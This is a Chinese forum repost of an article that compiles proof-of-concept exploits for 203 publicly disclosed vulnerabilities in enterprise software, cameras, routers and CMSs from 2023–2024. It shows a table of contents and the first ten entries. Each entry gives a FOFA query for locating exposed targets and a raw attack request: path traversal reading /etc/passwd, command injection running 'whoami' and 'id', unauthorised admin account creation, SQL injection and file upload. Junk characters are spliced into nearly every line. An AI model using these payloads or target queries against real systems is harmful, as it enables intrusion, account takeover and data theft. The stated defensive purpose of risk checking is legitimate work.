找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 5503|回复: 0

互联网公开漏洞整理202309-202406--转载

[复制链接]
发表于 2024-6-5 14:31:29 | 显示全部楼层 |阅读模式
互联网公开漏洞整理202309-202406
+ g! j0 @) y9 q' e/ u9 [: S4 s道一安全 2024-06-05 07:41 北京- t+ N0 K& a9 ~3 H/ U: F
以下文章来源于网络安全新视界 ,作者网络安全新视界5 O: C9 o9 i2 p; t5 Y3 ^

6 S: H' i. s2 W! R0 G# @  u. ~: p' J& q$ _发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。0 R/ x9 M9 D  `4 s  [1 E7 q1 e
* z: n6 {( T# m) c+ g7 F
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。8 A* }3 V2 y. c; J0 R3 }

" X: z; e/ }" X7 `' l  K, a0 ~安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。$ G! P) L7 d2 k
) u4 A. D. x( d- f0 H
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。6 a/ Z1 h1 n3 U9 @5 }! j/ N

7 \3 Y9 w0 |9 I5 m% k3 L合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。8 x. \( L) `* P9 e: w0 y6 P8 g& w* F

, {8 C; f* L+ J: g+ M( j9 }3 e& `: c# ~8 w" }. z2 E0 L1 L& _" F
声明
) Z7 S; t) E) K% i. p% s- _) a9 S6 f. o8 V# M
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
1 e# a. |" H# J4 V$ ~  x% c7 S% e8 }+ g3 l8 P/ K+ f
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
9 E! i, ?; K3 F4 C* x2 c/ t: d
. `5 A1 j1 R- J  X3 `) S6 [
8 {' H! @) [; [) l) j0 u. h+ ~* e2 h
/ t0 U2 ?+ u- T0 ^+ |' Q: g' O目录3 J& b; g# t- K- c6 u
& u' v' x9 s1 t, {5 i: B
01- r" _+ u* \1 S& }
- \; W. W9 V" v* ^7 y2 x4 q( d
1. StarRocks MPP数据库未授权访问  r" R$ O* o* Z$ b+ i$ s) n
2. Casdoor系统static任意文件读取$ S' k/ A3 s  B4 `6 O
3. EasyCVR智能边缘网关 userlist 信息泄漏" R- G  B( B/ ~$ ~( M# B3 E- q
4. EasyCVR视频管理平台存在任意用户添加3 T3 J5 B* c+ E8 _
5. NUUO NVR 视频存储管理设备远程命令执行5 p& H) j6 u  F
6. 深信服 NGAF 任意文件读取
1 C. u8 n% p0 Y( Y: U- ^0 ?" |7. 鸿运主动安全监控云平台任意文件下载
5 X4 c+ ^" y* k% @8. 斐讯 Phicomm 路由器RCE0 ~' K8 v$ E3 p# h$ ~1 L' V. ~7 I/ B
9. 稻壳CMS keyword 未授权SQL注入
1 _. `. V( w* b8 a10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
) F; C; V; X# @6 _5 _11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
. D/ ^7 c4 H. {% c12. Jorani < 1.0.2 远程命令执行/ h) a% O: G! ~0 z& w" R& u5 G
13. 红帆iOffice ioFileDown任意文件读取
! n$ x# o, R0 v8 Q14. 华夏ERP(jshERP)敏感信息泄露
5 _2 l, F$ T, }3 I$ c3 C15. 华夏ERP getAllList信息泄露
% X% ?9 T* i- x: I1 Z! t16. 红帆HFOffice医微云SQL注入
- V2 q3 ~4 ]6 E8 E& O, F, o17. 大华 DSS itcBulletin SQL 注入
) S; L. `* q# z1 y0 E, H18. 大华 DSS 数字监控系统 user_edit.action 信息泄露$ Q4 m! z4 j3 _0 u7 b
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入$ k: ^  h7 v3 Z( F) k* E
20. 大华ICC智能物联综合管理平台任意文件读取
& E3 v3 q" F' A5 N: \21. 大华ICC智能物联综合管理平台random远程代码执行
- u0 F9 |) }  q3 c8 S! n22. 大华ICC智能物联综合管理平台 log4j远程代码执行
+ q1 W6 n- m4 Y+ R/ n6 [/ [23. 大华ICC智能物联综合管理平台 fastjson远程代码执行5 y& Z7 @+ r, L7 {6 J# J
24. 用友NC 6.5 accept.jsp任意文件上传" q/ k) v  F% ^; P
25. 用友NC registerServlet JNDI 远程代码执行+ S4 O' Z: q) L# L
26. 用友NC linkVoucher SQL注入
* v8 v0 U: \. f( I6 N% ]: O( Q27. 用友 NC showcontent SQL注入  C* ?3 f7 @- Q' e0 |. Z
28. 用友NC grouptemplet 任意文件上传6 x1 J" l" H5 F; E
29. 用友NC down/bill SQL注入
: R6 J/ Y& r" U5 ^& t2 n  H- d30. 用友NC importPml SQL注入; z; X, v+ V( O, D5 n; x/ w
31. 用友NC runStateServlet SQL注入$ W0 L% f8 }& W
32. 用友NC complainbilldetail SQL注入; [  `  M1 T3 Y1 K
33. 用友NC downTax/download SQL注入
9 A/ M# [0 ?6 o: ^# M- M# d34. 用友NC warningDetailInfo接口SQL注入! W6 D. k+ Q" ~+ E: _
35. 用友NC-Cloud importhttpscer任意文件上传3 t( U; T7 A2 D! Q+ _1 ?
36. 用友NC-Cloud soapFormat XXE% w( s2 T* k" C5 }6 ]  l! N
37. 用友NC-Cloud IUpdateService XXE
3 u- n3 C( u" B$ j/ v2 T38. 用友U8 Cloud smartweb2.RPC.d XXE
1 d1 O& y' g7 Y6 y  ]) G9 G: D39. 用友U8 Cloud RegisterServlet SQL注入* M8 Y; w3 M4 z% @, p& H+ L& l
40. 用友U8-Cloud XChangeServlet XXE5 }0 Q0 [( q) i; P
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
7 N7 x4 N. L1 t- K. F0 `42. 用友GRP-U8 SmartUpload01 文件上传9 i& |3 p. x7 a; |  e7 u) I$ i; o1 C
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
( M! D- F- E) c44. 用友GRP-U8 bx_dj_check.jsp SQL注入& L: [) f- P: |& C
45. 用友GRP-U8 ufgovbank XXE
, b! y. C& c7 B! h4 J0 W" {46. 用友GRP-U8 sqcxIndex.jsp SQL注入  T* \1 H" Y' u4 ~  X( r* V. ?2 w
47. 用友GRP A++Cloud 政府财务云 任意文件读取
% {5 R( [5 x. A# R8 |0 i2 c1 A& i48. 用友U8 CRM swfupload 任意文件上传  u0 f% u& r+ C5 A9 s" i
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
( k% t8 m% ]# v) t0 d50. QDocs Smart School 6.4.1 filterRecords SQL注入
  W+ v! E0 B: J& N# D; v51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入! {! S' E. {3 F6 H! A( ]5 L0 r
52. 泛微E-Office json_common.php sql注入
- z" k& U; E, k9 y$ A+ ~" ?53. 迪普 DPTech VPN Service 任意文件上传
: Q7 i% A! U6 C  k" n8 ^. }54. 畅捷通T+ getstorewarehousebystore 远程代码执行: f5 r- V8 G- W3 H
55. 畅捷通T+ getdecallusers信息泄露/ J2 f. W$ o+ n0 Z% }
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE+ @; \1 c( G6 M% X# x
57. 畅捷通T+ keyEdit.aspx SQL注入+ E' A) O1 T( F5 K9 G
58. 畅捷通T+ KeyInfoList.aspx sql注入
' ~" d+ Z5 Z' D+ |8 G59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
% i, [+ b. |2 b+ r3 z60. 百卓Smart管理平台 importexport.php SQL注入" p0 n. O+ k- w3 V, a- S
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传; Z+ ^8 l6 ^. i: M5 n: l# L- H
62. IP-guard WebServer 远程命令执行
9 M4 B% t/ ~; \8 l, x' x) p63. IP-guard WebServer任意文件读取; x8 C% `* S  y
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
: w* _' D# b: M6 m! f1 x1 b6 W) E& B65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
) c  y( L& f2 R1 B$ X  b% t7 w66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入" x* A' ^7 }! Z  m& V  B( z
67. 万户ezOFFICE wpsservlet任意文件上传
+ O# l- _: p1 i68. 万户ezOFFICE wf_printnum.jsp SQL注入
: M, p, f9 R' O( J69. 万户 ezOFFICE contract_gd.jsp SQL注入; q' D  a7 A8 K1 }
70. 万户ezEIP success 命令执行
5 q0 _9 K6 [. g; F  `, d6 g71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
$ c) ~# C. j: W/ K72. 致远OA getAjaxDataServlet XXE1 W1 i1 z1 C; g
73. GeoServer wms远程代码执行
- ~) c1 J* F7 H9 H# ]74. 致远M3-server 6_1sp1 反序列化RCE( V3 A5 y: c0 O1 ^# l% Q
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
0 f% Q* H1 n1 J7 P* e5 \76. 新开普掌上校园服务管理平台service.action远程命令执行
2 S1 Y/ |. H: ^. q5 w, H/ ~; h" p77. F22服装管理软件系统UploadHandler.ashx任意文件上传
* c4 U9 S7 Y7 w, `, y* m4 q78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
2 U1 z" I0 Y3 J! V6 S79. BYTEVALUE 百为流控路由器远程命令执行
; x8 N: |, [; b5 \6 D, P; P80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传; d2 e: t/ R7 ]: f3 M
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露7 k  i' M1 B* R2 @6 ^
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行* ?# a3 q8 o% y5 P1 F1 C  k/ o& j
83. JeecgBoot testConnection 远程命令执行
7 K( F$ o8 G+ T84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
1 V; }8 j4 E* l+ G' N85. SysAid On-premise< 23.3.36远程代码执行
4 p; @6 I( y& W. r' T' A4 s86. 日本tosei自助洗衣机RCE6 U/ O: V( K9 L# Y9 r: I7 _9 k* ~
87. 安恒明御安全网关aaa_local_web_preview文件上传$ A  s# f6 e  Z& }+ X& b
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行. H# O/ s% S6 ^/ J, `- w; p
89. 致远互联FE协作办公平台editflow_manager存在sql注入
7 J+ `! J* q" A  R2 j90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
( e4 A  F, I1 W9 U5 ?' }91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取% w' ~- B0 K! F% _
92. 海康威视运行管理中心session命令执行# F: G4 k, N1 T% p+ q8 d2 a
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
; b7 B4 q7 H6 |' m( u+ L9 G94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
9 D  g) A' K: D* ]7 s& K& o1 u95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行  H6 e2 I$ Y5 R
96. Apache OFBiz  18.12.11 groovy 远程代码执行/ Z* l5 P) Y" {
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行7 a8 N, N- s! D; Q. _$ e+ n+ C
98. SpiderFlow爬虫平台远程命令执行; E9 Z( R/ `) e0 {9 \0 s6 @& v5 R
99. Ncast盈可视高清智能录播系统busiFacade RCE
5 e! l: ]3 o) n$ G; a100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
/ Z% f% s( l4 m* a101. ivanti policy secure-22.6命令注入3 z  N2 ?) j4 B# w- Z& {* z/ k
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行  o0 E1 H8 n! u, o8 t4 l% U
103. Ivanti Pulse Connect Secure VPN XXE3 A- S. r1 P0 d" E& Q. t  B
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
$ Y8 _' t6 ^( s9 k8 c2 L$ s+ F3 U105. SpringBlade v3.2.0 export-user SQL 注入, W2 c; N: M" D! i
106. SpringBlade dict-biz/list SQL 注入4 y; S# R% x* l2 ^
107. SpringBlade tenant/list SQL 注入! `  R+ m6 }+ R. ^' L7 H2 h& _9 L
108. D-Tale 3.9.0 SSRF0 _7 O/ A/ ?* X7 |
109. Jenkins CLI 任意文件读取4 b( s8 N1 ]2 s( {
110. Goanywhere MFT 未授权创建管理员! W% |' m4 e1 W' G3 p$ @6 M
111. WordPress Plugin HTML5 Video Player SQL注入9 ^5 H8 D9 Q$ e1 h
112. WordPress Plugin NotificationX SQL 注入
% V% C: X2 G7 q9 L; ?/ o  ?113. WordPress Automatic 插件任意文件下载和SSRF* X) C7 c/ F* P. a. \' [+ |( W
114. WordPress MasterStudy LMS插件 SQL注入
% T( S; U2 ]* G$ \/ \  }" X5 W4 m115. WordPress Bricks Builder <= 1.9.6 RCE- L' L! m. F  o8 f1 J
116. wordpress js-support-ticket文件上传
* E- ~* R$ R2 c! K+ A117. WordPress LayerSlider插件SQL注入& I3 c  |7 d8 k5 q  ^- V1 u
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
) M* ~4 q9 w& i% b0 M119. 北京百绰智能S20后台sysmanageajax.php sql注入, N) [% }7 m8 H# T+ Q8 s
120. 北京百绰智能S40管理平台导入web.php任意文件上传
* b/ Q: B9 n) E( C& I& Z121. 北京百绰智能S42管理平台userattestation.php任意文件上传
, `  u. H7 ]6 t122. 北京百绰智能s200管理平台/importexport.php sql注入. m6 u4 Z" w8 Z! e& t' C7 q
123. Atlassian Confluence 模板注入代码执行
% e/ w. @, ?+ u+ r$ P/ v124. 湖南建研工程质量检测系统任意文件上传
  N* p& l& h% Z/ }; C1 Q3 N125. ConnectWise ScreenConnect身份验证绕过. M! [$ y9 r4 t/ B; p
126. Aiohttp 路径遍历
( h* A4 U! y1 c127. 广联达Linkworks DataExchange.ashx XXE. t/ T2 l  d5 p1 g+ c- |$ ?4 Y
128. Adobe ColdFusion 反序列化
) G( U# [8 U! q3 P2 z5 v129. Adobe ColdFusion 任意文件读取
% O% A; j& _  R  F130. Laykefu客服系统任意文件上传: k+ |8 s& b' a! ?& ]- G; ^
131. Mini-Tmall <=20231017 SQL注入
# a. F0 Y# F4 X9 J) H132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
" _% L7 d3 F- g: i: X133. H5 云商城 file.php 文件上传, v) |/ q/ u& H3 ?. Q
134. 网康NS-ASG应用安全网关index.php sql注入* B; r3 O% \; s# t1 j
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
; k1 g6 q  ]) _$ L136. NextChat cors SSRF% G2 Q6 y6 u& W3 E0 x3 Q, ^
137. 福建科立迅通信指挥调度平台down_file.php sql注入2 g5 ?9 n# H+ Z
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入6 \/ u, N, S6 D
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
" X" e$ P! z! E: @140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入2 `) d. m; P- b% z1 C- H+ y' h
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
* F  c/ f* \3 k" c% o' o8 h) V0 |142. CMSV6车辆监控平台系统中存在弱密码
/ J$ `- z& w0 @5 j, o143. Netis WF2780 v2.1.40144 远程命令执行
9 T6 m) k; ~/ C144. D-Link nas_sharing.cgi 命令注入. V* z/ i; M  E' Z6 P& n& u5 W
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入% \( Y' `) Z/ A
146. MajorDoMo thumb.php 未授权远程代码执行; }" @$ ^8 v4 N7 D; d7 `" x
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历, F4 g# ~: s# v
148. CrushFTP 认证绕过模板注入
$ h0 ?' v# E9 {: Z3 S% P! t149. AJ-Report开源数据大屏存在远程命令执行
6 w6 z+ ~' k; ~% P' l' h" e! e3 E/ R/ T150. AJ-Report 1.4.0 认证绕过与远程代码执行5 t/ m4 h" `* ~
151. AJ-Report 1.4.1 pageList sql注入- `! B3 I- i* B9 V- S0 ]$ v
152. Progress Kemp LoadMaster 远程命令执行
/ ?( ?  s. G, f+ p' k% F+ P5 B$ u153. gradio任意文件读取4 H# r/ ]; a' I# k1 Y
154. 天维尔消防救援作战调度平台 SQL注入
! a" U% k: r  W9 @* `7 S155. 六零导航页 file.php 任意文件上传! [$ r  A7 j4 \+ d, P: D  \3 s
156. TBK DVR-4104/DVR-4216 操作系统命令注入- D+ U* `' _2 u* ~' @
157. 美特CRM upload.jsp 任意文件上传
* \4 X) k2 |* ~- C; k158. Mura-CMS-processAsyncObject存在SQL注入
9 P/ B+ ~2 D4 ~: B3 u8 p159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
4 C; X8 U; H  d' i% n4 d160. Sonatype Nexus Repository 3目录遍历与文件读取/ a6 r6 ~, K3 ~
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
3 i; l4 L! E& o4 s162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传+ l# G7 l6 R3 i* W& o" s( m
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
3 O! {" y" T3 ?164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
! E8 p$ F: ?: _1 V8 F! t165. OrangeHRM 3.3.3 SQL 注入
0 C3 E* _# y) h# B7 B166. 中成科信票务管理平台SeatMapHandler SQL注入& m4 o& g" ~) p5 ^4 U
167. 精益价值管理系统 DownLoad.aspx任意文件读取
8 w' y5 u" T* Y6 P8 K168. 宏景EHR OutputCode 任意文件读取9 S% m' T7 n2 L- N* s9 V
169. 宏景EHR downlawbase SQL注入% W4 y! s/ K$ ]; O3 m
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
1 _% L" s) X! |% f# |# J2 N, |171. 通天星CMSV6车载定位监控平台 SQL注入
) f* Z3 V5 X$ A) J" d172. DT-高清车牌识别摄像机任意文件读取
. F' j4 |  x; B2 M' C3 I& X173. Check Point 安全网关任意文件读取
. v8 w; X$ U7 {- P9 ?174. 金和OA C6 FileDownLoad.aspx 任意文件读取
$ k. [: ~# U6 [175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
1 r/ _2 k/ M. r176. 电信网关配置管理系统 rewrite.php 文件上传
  @( B; q* u& ?% W177. H3C路由器敏感信息泄露
4 G; ^0 H6 Y- J' p8 v: @178. H3C校园网自助服务系统-flexfileupload-任意文件上传
, ~* K' w: t# N3 [179. 建文工程管理系统存在任意文件读取
4 M; X+ l" {: e* k9 F: o. }, x180. 帮管客 CRM jiliyu SQL注入; h! U* f  z! w( Q
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
% Z/ u, {8 f8 P3 `9 Y182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建% U  W' F. ]7 v, Z; K# i
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
  s* A+ I- ?/ _, ^+ Q184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
9 M% R! S4 v, y185. 瑞友天翼应用虚拟化系统SQL注入* D5 {; \- g& p( \6 h, R& s1 R3 F/ [
186. F-logic DataCube3 SQL注入
0 a& Y9 `9 h9 l7 l% }) H187. Mura CMS processAsyncObject SQL注入
& t  m' X1 {( G; s  m0 _9 V188. 叁体-佳会视频会议 attachment 任意文件读取
' Q" L/ D8 @2 V3 F8 h, f$ t( L189. 蓝网科技临床浏览系统 deleteStudy SQL注入
* J* g0 ]1 f; A" p3 W190. 短视频矩阵营销系统 poihuoqu 任意文件读取
0 u5 Y- g3 \; D, ^( D0 S. X191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入  B% ]0 {7 O: d6 B, ~
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
- E# w: p0 h& f# X193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行& F6 N- L% X: k$ w, l# x) b
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传  j3 ]/ _. g- Q7 M9 [! `) n
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行' y% l% r4 q2 x7 b- q% [
196. 河南省风速科技统一认证平台密码重置6 h* i, B5 {* w; [5 A2 b* h  h
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
/ C" M$ U5 v; Z/ J! g) e198.  阿里云盘 WebDAV 命令注入
, V1 V% y6 f; f* k199. cockpit系统assetsmanager_upload接口 文件上传
" Y% d6 x3 i  `200. SeaCMS海洋影视管理系统dmku SQL注入" f( P3 h  y- _; D% n+ `
201. 方正全媒体新闻采编系统 binary SQL注入) H' P; }( u  N9 F7 X$ E
202. 微擎系统 AccountEdit任意文件上传- n6 B) T$ A& e( @
203. 红海云EHR PtFjk 文件上传/ A: z5 A. b# ~1 w. J! Z8 j
' O7 n* y) I) ^' `
POC列表
9 @. {6 {+ X0 ^* `8 p1 B) C6 j/ u6 C3 U0 E
02
1 i$ ?  A4 ?7 U' h  W, y3 }
( W$ p- {8 K$ U' {$ L1. StarRocks MPP数据库未授权访问+ U% Z$ _- `- X  B& \5 J2 [
FOFA :title="StarRocks"
" P6 n" ~% e9 ]( \( t- yGET /mem_tracker HTTP/1.1
: O0 z* r0 C- D8 g% M4 @. mHost: URL* i, v1 W$ c; O  d6 J$ A; o/ Z

# y9 F' G) X  f! t/ _' T7 z+ _
4 L) X( q! R& s; W" w2. Casdoor系统static任意文件读取1 P% I/ p% W# P! S  ]3 O3 r
FOFA :title="Casdoor"9 W; m. J8 ^% M* u7 n1 o, H  }' y8 F
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
$ G+ J9 P2 [1 J9 C% j; PHost: xx.xx.xx.xx:9999
  j5 P8 f0 k5 n- B4 F3 t7 qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ ]) ?" Y4 Z- d3 s# g
Connection: close0 E) ?9 K2 \% X/ ^
Accept: */*5 x) n+ q0 g+ |' A1 H% n0 c
Accept-Language: en
9 l3 O8 a- T0 H  p) e- q2 [Accept-Encoding: gzip
# n6 u% E$ g, r3 |7 j1 P$ a0 Q2 r! {

% C) ]  v$ L- F" g* i8 \" p& @2 q3. EasyCVR智能边缘网关 userlist 信息泄漏5 Z7 R4 I: k8 C7 H0 x: H
FOFA :title="EasyCVR"
$ ^% A- y9 J; |/ i3 z, nGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1. l* l" V, _+ U3 y9 o. i
Host: xx.xx.xx.xx" ~; {! m6 v6 m
  @/ C- _. G1 G
3 r! x/ s0 Z. C
4. EasyCVR视频管理平台存在任意用户添加
$ L  `/ ~- G9 D/ g/ k) eFOFA :title="EasyCVR"
8 q- z( f( v& N- v, M9 m% k$ l$ u4 N
  o( n8 a; v% d- C6 Y! spassword更改为自己的密码md5, l& X" f* q: h8 _/ K* U
POST /api/v1/adduser HTTP/1.1
7 {1 I/ g, B* }! u% I7 QHost: your-ip
% ]) B! a% a, A' M5 c- IContent-Type: application/x-www-form-urlencoded; charset=UTF-88 k4 V. W7 M3 r; Q$ b/ |' {7 e
: t0 K& [8 q0 C2 }/ @" N
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
  m2 U: Y+ [% {' ]" Q4 j3 X( l: \4 X$ Z* V% q; _
  B+ l9 o( y  g' V' _
5. NUUO NVR 视频存储管理设备远程命令执行
8 [- Z# \1 u* v9 o7 fFOFA:title="Network Video Recorder Login"
0 H8 d# E: ^8 B/ rGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" d; P7 F( |- e6 X6 \' x3 I' }/ H
Host: xx.xx.xx.xx
0 t2 e4 h$ |* b' m( z/ i- }, p- D- [9 l3 m3 `( D

7 k3 C& z5 i6 ]4 X; ?1 L( v6. 深信服 NGAF 任意文件读取
0 j* Y; D5 x$ W. i6 |' vFOFA:title="SANGFOR | NGAF"; l, c% e6 o$ J
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
! ?* L# `/ M) K) H5 GHost:% G7 W* q6 x3 y6 b( o) X; I0 E

* }/ h8 }5 \& V! w$ J& u
* u9 u" U# A& |4 s9 F3 ]6 t7. 鸿运主动安全监控云平台任意文件下载! ^8 i$ Z/ |; x/ {
FOFA:body="./open/webApi.html"
+ s$ C0 z6 j8 R: ?GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
3 r. b/ e5 W0 ~0 YHost:
0 y8 U) }" h: h8 F& Y7 u& U
) N8 {- ]( i' ~" L
% ], y5 r* _  F0 A5 O8. 斐讯 Phicomm 路由器RCE9 N0 v5 B! d% ?7 }
FOFA:icon_hash="-1344736688"% c6 x$ q2 o$ ], R' j/ q% V& x- Y
默认账号admin登录后台后,执行操作; L. q. ^" R9 G6 o0 U! z
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1: J+ ]2 x) j3 n$ f# d! R
Host: x.x.x.x
5 ?- D8 c3 o- C' f& _Cookie: sysauth=第一步登录获取的cookie
. u' e/ b/ K0 F1 IContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz+ V% {5 |' _. u" _
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
6 e2 ~) \3 G; ^# p, \
$ k  @/ U2 L0 Q% y0 N: Y) M: p( I------WebKitFormBoundaryxbgjoytz
- y6 K$ U+ V& v0 S: h% z- @% I* ^Content-Disposition: form-data; name="wifiRebootEnablestatus"
, X( k) M: S+ l% E6 f% N8 J9 i
' ~. w& T/ y2 C! c%s8 J3 [2 W. O8 N* R# d
------WebKitFormBoundaryxbgjoytz5 z! J4 I- J2 k4 _! P4 \
Content-Disposition: form-data; name="wifiRebootrange"
9 ]( j4 l1 b- N) m; R
6 A$ r+ d2 A1 u) K8 n# J12:00; id;9 }( H# h+ ]1 }3 U6 G
------WebKitFormBoundaryxbgjoytz
& v/ v6 u1 Y$ I9 h5 IContent-Disposition: form-data; name="wifiRebootendrange"% z7 e* V: y8 a' K  H, [# ^
/ w1 R, [$ Y# V/ R5 x
%s:
" R& A8 s2 m, t------WebKitFormBoundaryxbgjoytz
. t$ w- h  W# oContent-Disposition: form-data; name="cururl2"
. j/ [% i$ k! o9 J* X4 I7 M
/ S( t' t% _% D. x: r) C  V. Z- ]
( Y2 E" t6 O* E9 n------WebKitFormBoundaryxbgjoytz--! `+ w; l- U6 x9 b
& M  f, w# m8 |6 d
& w* S: g, {' u2 V* B
9. 稻壳CMS keyword 未授权SQL注入
8 }, @/ V3 j5 L3 v. K$ BFOFA:app="Doccms"3 ?. i& q1 d% ?6 O0 J1 H8 B
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
- E. F8 c0 H$ a- r" A: iHost: x.x.x.x) e/ W- S3 V% {$ x9 s5 a3 G8 `* t: o
+ {6 Y6 z5 K! D- v3 G# }# @

  }" y( a9 f# t( u  C1 ^2 rpayload为下列语句的二次Url编码
0 V3 ^% e8 Z' T- H( \0 X2 _2 {3 f1 A" ?
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#! `/ i/ z7 K5 M* M7 T) l

" j( n- u0 T# @) s10. 蓝凌EIS智慧协同平台api.aspx任意文件上传7 P& g" A' R' s
FOFA:icon_hash="953405444"" t" \# e. l) x0 ?) _( t8 u* Y1 i0 A
9 j9 F) a4 A4 g( }3 N! h
文件上传后响应中包含上传文件的路径
2 y* {" D1 {0 w* |! R- K, RPOST /eis/service/api.aspx?action=saveImg HTTP/1.1" Y( B6 m: b% T0 C6 S
Host: x.x.x.x:xx5 `( V" `% f, \( k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
$ A- R& {6 g  p7 f: zContent-Length: 197
  ]9 `* N' \/ Z1 R% H/ |$ O2 u! xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 L+ f2 D& v1 S
Accept-Encoding: gzip, deflate+ J# y$ D/ J8 |8 m; U' b
Accept-Language: zh-CN,zh;q=0.9( i7 i! P9 e6 q  T1 s$ }
Connection: close
) z( e. m& e8 u) g  lContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu" L1 g. Q# a% Q

" p0 }+ K( v# d  D------WebKitFormBoundaryxdgaqmqu
# @. f, L8 ?/ c4 S1 hContent-Disposition: form-data; name="file"filename="icfitnya.txt"  r4 X6 `6 y9 P4 @1 f. F
Content-Type: text/html
* a- n1 V0 [- E, `) v
- H; P3 ?+ y! m- q6 j& _jmnqjfdsupxgfidopeixbgsxbf  z+ U9 P0 v6 i* G+ r1 O" ?9 v
